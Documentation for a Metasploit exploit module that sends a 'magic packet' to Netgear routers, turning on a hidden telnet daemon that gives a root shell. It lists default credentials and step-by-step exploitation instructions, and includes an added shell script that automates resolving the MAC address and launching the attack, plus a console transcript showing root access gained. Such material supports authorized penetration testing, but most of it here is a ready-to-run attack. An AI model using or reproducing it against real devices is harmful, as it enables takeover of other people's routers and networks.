metasploit-gs/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
2018-03-02 19:15:20 -06:00


Intro

Several models of Netgear devices ship with a hidden telnet daemon that a user on the LAN can enable by sending a 'magic packet' to the device. Upon successful connection, a root shell is presented to the user.

Many devices contain this daemon; for a full list, see OpenWrt.

This module has been successfully tested against:

  • AC1450 in whatever version I bought it with (TCP)
  • AC1450 latest V1.0.0.36_10.0.17 (UDP)
  • N300 WNR2000 v3 (TCP)

Setup

The MAC address of the device's LAN interface is required for exploitation. ARP only works within the local broadcast domain, so run these steps from a host on the same LAN segment as the device:

  1. Ping the device to force an ARP lookup: ping -c 1 [IP]
  2. Get the MAC: arp -an [IP]

Targets

0 (Automatic)

Detects whether the device's telnetenable service listens on TCP or UDP, then proceeds with the matching target.

1 (TCP)

Older devices usually listen on TCP.

2 (UDP)

Newer devices usually listen on UDP.

Options

MAC

Set this to the MAC address of the device's LAN interface. You can use ping and arp to find it, as described under Setup.

USERNAME

If this is an older device, it'll take the value of super_username in nvram. Gearguy is usually correct.

If this is a newer device, it'll take the web UI username, which is usually unchanged from admin.

PASSWORD

If this is an older device, it'll take the value of super_passwd in nvram. Geardog is usually correct.

If this is a newer device, it'll take the web UI password, which is usually unchanged from password.

VERBOSE

This will display the username and password used in the magic packet.

Exploitation

  1. Make sure you have a vulnerable device
  2. Start metasploit
  3. use exploit/linux/telnet/netgear_telnetenable
  4. set rhost [IP]
  5. set mac [MAC Address]
  6. exploit
  7. Enjoy a root shell!
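The Setup and Exploitation steps above can be driven from one script. The following is an added example, not code from the module documentation or the Metasploit project: it assumes Linux net-tools `arp -an` output and an `msfconsole` on PATH, and the helper names are my own. It also handles the case the manual steps gloss over, an ARP entry that reads "<incomplete>" because the device never answered (typically because you are not on its LAN segment).

```shell
#!/bin/sh
# Added example (not part of the module docs or Metasploit): resolve the
# target's MAC with ping + arp, then hand RHOST and MAC to the module via
# `msfconsole -x`. Assumes Linux net-tools `arp -an` output.

MODULE=exploit/linux/telnet/netgear_telnetenable

# Pull the MAC out of one line of `arp -an` output, e.g.
#   "? (192.168.1.1) at 08:00:27:12:34:56 [ether] on wlan0"
# A line reading "at <incomplete>" means the host never answered ARP;
# nothing is printed, and the caller must treat that as a failure.
mac_from_arp_line() {
    printf '%s\n' "$1" |
        sed -n 's/.* at \([0-9A-Fa-f:]\{17\}\) .*/\1/p'
}

# Force an ARP lookup with a single ping, then read the cached entry.
# Returns 1 when no complete entry exists for the address.
resolve_mac() {
    ip="$1"
    ping -c 1 -W 2 "$ip" >/dev/null 2>&1
    mac=$(mac_from_arp_line "$(arp -an "$ip")")
    [ -n "$mac" ] || return 1
    printf '%s\n' "$mac"
}

# Build the command string for `msfconsole -x`. Target 0 (Automatic) is used
# unless a third argument selects 1 (TCP) or 2 (UDP), matching the Targets
# section. VERBOSE is enabled so the credentials used are shown.
build_msf_commands() {
    ip="$1" mac="$2" target="${3:-0}"
    printf 'use %s; set RHOST %s; set MAC %s; set TARGET %s; set VERBOSE true; run' \
        "$MODULE" "$ip" "$mac" "$target"
}

# Usage: ./telnetenable.sh 192.168.1.1 [target]
main() {
    ip="$1" target="${2:-0}"
    mac=$(resolve_mac "$ip") || {
        echo "no complete ARP entry for $ip: are you on the same LAN segment?" >&2
        exit 1
    }
    echo "resolved $ip -> $mac" >&2
    # No trailing `exit`: once `run` lands the shell, the console stays open
    # so you can interact with the session.
    exec msfconsole -q -x "$(build_msf_commands "$ip" "$mac" "$target")"
}

# Only run main when invoked with an address, so the functions can be sourced.
if [ -n "${1:-}" ]; then
    main "$@"
fi
```

The MAC is passed to the module in the colon-separated form `arp` prints, which is the same form shown in the Usage transcript below. If `resolve_mac` fails, check that the attacking host really sits on the device's LAN side before blaming the module.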

Usage

msf5 > use exploit/linux/telnet/netgear_telnetenable
msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
[*] exec: ping -c 1 192.168.1.1

PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.19 ms

--- 192.168.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.198/1.198/1.198/0.000 ms
msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
[*] exec: arp -an 192.168.1.1

? (192.168.1.1) at [redacted] [ether] on wlan0
msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
mac => [redacted]
msf5 exploit(linux/telnet/netgear_telnetenable) > set verbose true
verbose => true
msf5 exploit(linux/telnet/netgear_telnetenable) > run

[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[*] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.

id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#

If telnetd is already running on the device (for example because you have already exploited TelnetEnable), the module detects it and connects to telnetd directly, which saves sending the magic packet again.

msf5 exploit(linux/telnet/netgear_telnetenable) > run

[+] 192.168.1.1:23 - Detected telnetd on TCP
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.